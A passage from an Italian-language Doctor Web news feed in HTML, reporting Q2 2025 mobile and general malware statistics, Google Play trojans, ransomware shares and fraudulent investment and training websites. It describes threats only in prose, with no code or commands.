        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di alcune versioni modificate (mods) dell'app di messaggistica WhatsApp, nelle funzionalità delle quali è incorporato un codice per caricare i link di destinazione tramite web view durante l'utilizzo dell'app. Da questi indirizzi internet viene eseguito il reindirizzamento verso i siti pubblicizzati — ad esempio, casinò online e scommesse, siti per adulti.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Moduli adware che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Applicazioni che visualizzano annunci pubblicitari indesiderati che spesso portano a siti malevoli e truffaldini. Hanno una base di codice comune con i programmi indesiderati &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Modulo adware che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Software pubblicitario indesiderato per dispositivi Android, che durante l'installazione di applicazioni visualizza un banner con programmi raccomandati per l'installazione.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="gplay"&gt;
    &lt;h3&gt;Minacce su Google Play&lt;/h3&gt;
    &lt;p&gt;
        Durante il II trimestre 2025 gli analisti dei virus Doctor Web hanno rilevato sullo store di app Google Play 
        diverse decine di minacce, tra cui svariati programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. 
        Questi trojan di nuovo venivano attivamente distribuiti sotto le apparenze di applicazioni a tema finanziario, 
        e invece di fornire le funzionalità promesse, potevano caricare siti fraudolenti.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/05_Android.FakeApp.1863.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/05_Android.FakeApp.1863.1.png" alt="Android.FakeApp_Q2_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/06_Android.FakeApp.1859.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/06_Android.FakeApp.1859.1.png" alt="Android.FakeApp_Q2_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        &lt;b&gt;Android.FakeApp.1863&lt;/b&gt; e &lt;b&gt;Android.FakeApp.1859&lt;/b&gt; — esempi di trojan rilevati. 
        Il primo era nascosto nel programma TPAO e mirato agli utenti turchi che venivano invitati 
        a "gestire facilmente i propri depositi e proventi". Il secondo veniva spacciato dai malintenzionati 
        per "assistente per questioni finanziarie" Quantum MindPro, progettato per un pubblico di lingua francese
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Un'altra copertura popolare per i simili programmi falsificazione rimangono i giochi. A determinate condizioni, invece di eseguire le funzionalità gioco, essi caricano siti di casinò online e di scommesse.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/07_Android.FakeApp.1840.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/07_Android.FakeApp.1840.1.png" alt="Android.FakeApp_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        &lt;b&gt;Android.FakeApp.1840&lt;/b&gt; (Pino Bounce) — uno dei falsi giochi che poteva caricare un sito di casinò online
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Oltre a ciò, i nostri specialisti hanno rilevato un software pubblicitario indesiderato &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;. 
        Era nascosto in un programma con materiali informativi su criptovalute Coin News Promax. &lt;b&gt;Adware.Adpush.21912&lt;/b&gt; 
        visualizza notifiche, al clic sulle quali viene caricato in una WebView un link impostato dal server di gestione.
    &lt;/p&gt;
     &lt;div class="flex fxCenter"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/08_Adware.Adpush.21912.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/08_Adware.Adpush.21912.1.png" alt="Adware.Adpush_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;
        Per proteggere i dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.
    &lt;/p&gt;
&lt;/section&gt;
&lt;br /&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q2%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15026&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in II trimestre 2025</title><link>https://news.drweb-av.it/show/?i=15026&amp;lng=it&amp;c=9</link><pubDate>Tue, 01 Jul 2025 02:00:00 GMT</pubDate><description>



&lt;p&gt;&lt;b&gt;1 luglio 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web, nel II trimestre 2025 il numero totale di minacce rilevate è diminuito del 7,38% rispetto al I trimestre. Il numero di minacce uniche anche si è ridotto del 23,10%. Il più frequentemente sui dispositivi protetti venivano rilevati i software pubblicitari indesiderati, i backdoor, i trojan pubblicitari e gli script malevoli. Nel traffico email le minacce più diffuse sono stati i trojan downloader, i vari script malevoli e i trojan dropper.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;
    Gli utenti i cui file sono stati colpiti dai trojan ransomware di criptazione 
    affrontavano il più spesso &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.35209&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt;, 
    nonché &lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;.
  &lt;/p&gt;
  &lt;p&gt;
    Ad aprile gli analisti dei virus dell'azienda Doctor Web hanno segnalato un trojan trovato nel 
    firmware di una serie di modelli di smartphone Android. Tramite di esso i cybercriminali rubavano 
    criptovalute. Inoltre, i nostri specialisti hanno individuato un trojan Android che i malintenzionati 
    avevano inserito in una delle versioni di un popolare programma cartografico e utilizzavano per spiare militari russi. 
  &lt;/p&gt;
  &lt;p&gt;
    Durante il II trimestre i nostri analisti internet hanno scoperto molteplici nuovi siti fraudolenti. 
    Tra questi erano siti di formazione inesistenti, che presumibilmente consentirebbero alle potenziali 
    vittime di seguire un corso di formazione online e migliorare la propria qualifica, nonché ennesimi 
    siti a tema investimento che promettevano guadagni facili e veloci.
  &lt;/p&gt;
  &lt;p&gt;
    Le statistiche di rilevamenti sui dispositivi mobili hanno indicato una minore attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, 
    tuttavia, questa famiglia di programmi malevoli rimane, come prima, la minaccia Android più diffusa. Oltre a ciò, nel II trimestre il nostro 
    laboratorio dei virus ha rilevato numerose nuove minacce sullo store di app Google Play.
  &lt;/p&gt;
  &lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di II trimestre&lt;/h3&gt;
    &lt;ul&gt;
      &lt;li&gt;Diminuito il numero di minacce rilevate sui dispositivi protetti&lt;/li&gt;
      &lt;li&gt;Diminuito il numero di minacce uniche impiegate in attacchi&lt;/li&gt;
      &lt;li&gt;Comparsi numerosi siti fraudolenti presumibilmente legati al campo di formazione e alle finanze&lt;/li&gt;
      &lt;li&gt;Registrato un attacco di un trojan spia ai militari russi che utilizzano un popolare software cartografico per dispostivi Android&lt;/li&gt;
      &lt;li&gt;Rilevato nel firmware di una serie di modelli di smartphone Android un trojan progettato per furti di criptovalute&lt;/li&gt;
      &lt;li&gt;Trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; rimangono una delle minacce Android più diffuse&lt;/li&gt;
      &lt;li&gt;Sullo store di app Google Play rilevati ennesimi programmi malevoli e indesiderati&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h3&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h3&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/01_stat_q2_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/01_stat_q2_2025_en.png" alt="stat_2025_Q2"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;Minacce più diffuse di II trimestre 2025:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo che in ciclo infinito cerca finestre con il testo &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; e &lt;span class="string"&gt;розробника&lt;/span&gt; e invia ad esse un evento di clic sul pulsante Escape, chiudendole forzatamente.&lt;/dd&gt; 
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware utilizzato come installer intermedio di software pirata.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.3814&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Processo host di un framework Electron modificato dai malintenzionati, che si mimetizza da componente dell'applicazione Steam (Steam Client WebHelper) e carica un backdoor JavaScript.&lt;/dd&gt;
  &lt;/dl&gt;
  &lt;h3&gt;Statistiche sulle applicazioni malevole nel traffico email&lt;/h3&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/02_mail_traffic_q2_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/02_mail_traffic_q2_2025_en.png" alt="mail_traffic_2025_Q2"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Una famiglia di script malevoli, scritti nel linguaggio JavaScript. Incorporano uno script malevolo nel codice HTML di pagine web.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Win32.HLLW.Rendoc.3&amp;lng=it"&gt;&lt;b&gt;Win32.HLLW.Rendoc.3&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Un worm di rete che si diffonde, tra l'altro, anche attraverso dispositivi rimovibili.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;PDF.Phisher.867&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Documenti PDF utilizzati in invii email di phishing.&lt;/dd&gt;
  &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="encruptor"&gt;
  &lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;
  &lt;p&gt;
    Nel II trimestre 2025, il numero di richieste per la decriptazione di file interessati da trojan ransomware di criptazione è diminuito del 14,65% rispetto al I trimestre.
  &lt;/p&gt;
  &lt;p&gt;
    Dinamica del numero di richieste di decriptazione pervenute al servizio di supporto tecnico Doctor Web:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/03_encoder_requests_q2_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/03_encoder_requests_q2_2025_en.png" alt="encoder_stat_2025_Q2"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;Ransomware di criptazione più diffusi di II trimestre 2025:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 24,41% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.35209&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 4,41% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.29750 &lt;/b&gt; — 2,71% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2,71% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868 &lt;/b&gt; — 2,71% di richieste utente&lt;/li&gt;
  &lt;/ul&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="netfraud"&gt;
  &lt;h3&gt;Frode online&lt;/h3&gt;
  &lt;p&gt;
    Durante il II trimestre 2025 gli analisti internet dell'azienda Doctor Web hanno rilevato numerosi siti 
    web fraudolenti presumibilmente legati al campo di formazione. Così, hanno guadagnato diffusione le risorse 
    internet che offrivano la formazione in determinate professioni. Ad esempio, le piattaforme progettate per 
    gli utenti di Kazakistan: SMM Академия (trad. da russ. Accademia SMM) e LearnIT KZ presumibilmente consentirebbero 
    di "padroneggiare la professione del manager SMM in 3 mesi" e "diventare analista di dati".
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/04_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/04_q2_2025_fraud.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/05_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/05_q2_2025_fraud.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Su altri siti le potenziali vittime presumibilmente potrebbero conoscere vari corsi di formazione. 
    Tra questi erano i corsi di lingua inglese e di acquisizione di competenze di gestione del capitale, 
    forniti dalle "piattaforme" EnglishPro e FinCourse rispettivamente:
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/06_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/06_q2_2025_fraud.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/07_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/07_q2_2025_fraud.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Il sito truffaldino di un certo servizio web "Финансовое Образование" (trad. da russ. "Formazione Finanziaria") 
    presumibilmente potrebbe aiutare a migliorare l'alfabetizzazione finanziaria — su di esso i visitatori venivano 
    invitati a "padroneggiare le proprie finanze e garantire il proprio futuro".
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/08_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/08_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Per "accedere" ai servizi pubblicizzati, tali siti richiedono una registrazione con l'indicazione di dati personali — ad 
    esempio, nome, numero di cellulare, indirizzo email ecc. Questi dati vengono accumulati nelle mani dei malintenzionati e 
    in seguito possono essere utilizzati in vari schemi di frode.
  &lt;/p&gt;
  &lt;p&gt;
    Oltre a ciò, sono comparsi nuovi siti fraudolenti di pseudo progetti di investimento, che i cybercriminali spesso 
    presentano come presumibilmente legati a note aziende e servizi web. Ad esempio, su uno di essi agli utenti veniva 
    suggerito di diventare partecipanti a un progetto innovativo su base di tecnologie di intelligenza artificiale. 
    Questa risorsa veniva spacciata per servizio web della compagnia automobilistica Audi e presumibilmente consentirebbe 
    di fare trading su criptovalute in modalità automatica e ottenere un alto reddito garantito. Per "l'accesso" al 
    servizio web era richiesto di versare un importo iniziale di €250.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/09_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/09_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Un altro "progetto di investimento" presumibilmente sarebbe relativo al social network TikTok. 
    Ai visitatori del sito fraudolento veniva chiesto di partecipare a un breve sondaggio e quindi 
    fornire i dati personali per registrarsi e accedere al servizio web promesso:
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_1.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_2.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Inoltre, sono stati rilevati ennesimi siti truffa mascherati da risorse web ufficiali del sistema di messaggistica WhatsApp. 
    Su uno di essi gli visitatori venivano invitati a ottenere monete digitali, ciascuna di cui "fa guadagnare al proprietario €15 
    al giorno". All'utente presumibilmente sarebbero diventati disponibili 160 tali monete, ma per iniziare a "guadagnare con esse", 
    deve registrare un account indicando i dati personali. In realtà, la potenziale vittima non riceveva alcuna risorsa digitale, 
    mentre i suoi dati andavano a finire tra le mani dei truffatori.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_1.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_2.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Un altro falso sito WhatsApp presumibilmente fornirebbe l'accesso a un ennesimo bot di trading basato su certe tecnologie uniche. 
    Agli utenti veniva raccomandato di "lanciare WhatsApp Bot e guadagnare in automatico". Per fare questo, a loro tradizionalmente veniva 
    chiesto di registrarsi fornendo i dati personali i quali quindi venivano trasferiti ai malintenzionati.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/12_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/12_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Inoltre, i truffatori prendevano di mira gli utenti da determinati paesi. Ad esempio, gli abitanti di Russia potevano 
    imbattersi in siti che invitavano loro a "realizzare i propri sogni" con un determinato servizio web di investimento. 
    I malintenzionati utilizzavano un uguale modello per implementare tali risorse modificandone solo l'aspetto esteriore, 
    nonché cambiando i nomi delle piattaforme inesistenti.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_2.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    È interessante notare che siti su base dello stesso modello venivano creati anche per gli abitanti di altri paesi — ad esempio, di Uzbekistan:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/14_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/14_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Uno dei siti fraudolenti rilevati allettava gli utenti di lingua russa abitanti in Europa. Su di esso i cybercriminali 
    promettevano alle potenziali vittime un reddito passivo fino ai €1000 alla settimane "tramite le soluzioni finanziarie 
    innovative di nuova generazione" da una certa piattaforma LevelUPTrade:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/15_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/15_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Gli utenti da Francia potevano cadere vittima dei malintenzionati che offrivano l'accesso a un inesistente software di 
    trading automatizzato TraderAI. Tramite di esso le potenziali vittime presumibilmente avrebbero la possibilità di guadagnare a partire dai €3500:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/16_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/16_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Per gli abitanti di Messico i truffatori anche hanno preparato un "sistema di trading intelligente" — QuantumIA. 
    Questa è una delle varianti del ben noto pseudo sistema di trading Quantum System o QuantumAI che presumibilmente 
    consentirebbe di fare trading su mercati finanziari automaticamente con l'utilizzo di calcoli quantistici e tecnologie di intelligenza artificiale.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_1.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_2.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Su un altro sito i truffatori, presumibilmente a nome di una grande banca, offrivano agli utenti messicani servizi di investimento — 
    promettevano la chance di guadagnare 16.000 pesos messicani entro un breve tempo dopo la registrazione. Per fare ciò, era necessario 
    fornire i propri dati personali.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/18_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/18_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Gli utenti tedeschi rischiavano di cadere vittima della falsa piattaforma di trading Lucrosa Infinity, la cui immagine, 
    in una forma o nell'altra, i cybercriminali sfruttano da diversi anni. Su uno dei siti truffa i malintenzionati consigliavano 
    di "iniziare a investire e aprire la porta all'indipendenza finanziaria":
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/19_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/19_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Gli abitanti di Canada i cybercriminali anche invitavano a utilizzare servizi web "unici" che presumibilmente garantirebbero un 
    alto reddito tramite investimenti e il trading di criptovalute. Ad esempio, i siti fraudolenti rilevati pubblicizzavano le "piattaforme" 
    come BitcoinFusionPro e BitcoinReaction. Presumibilmente fornirebbero la possibilità ai clienti di guadagnare dai 1000 dollari canadesi 
    al giorno, investendo "i soli" 350 dollari:
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/20_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/20_q2_2025_fraud.2.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/21_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/21_q2_2025_fraud.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Nei simili siti falsificazione si imbattevano anche gli abitanti di Polonia. Su uno di essi i truffatori promettevano alle 
    potenziali vittime che loro potrebbero guadagnare dai $950 ai $2200 al giorno con "il software per la gestione delle criptovalute più evoluto al mondo":
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/22_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/22_q2_2025_fraud.png" alt="Net Fraud"&gt;
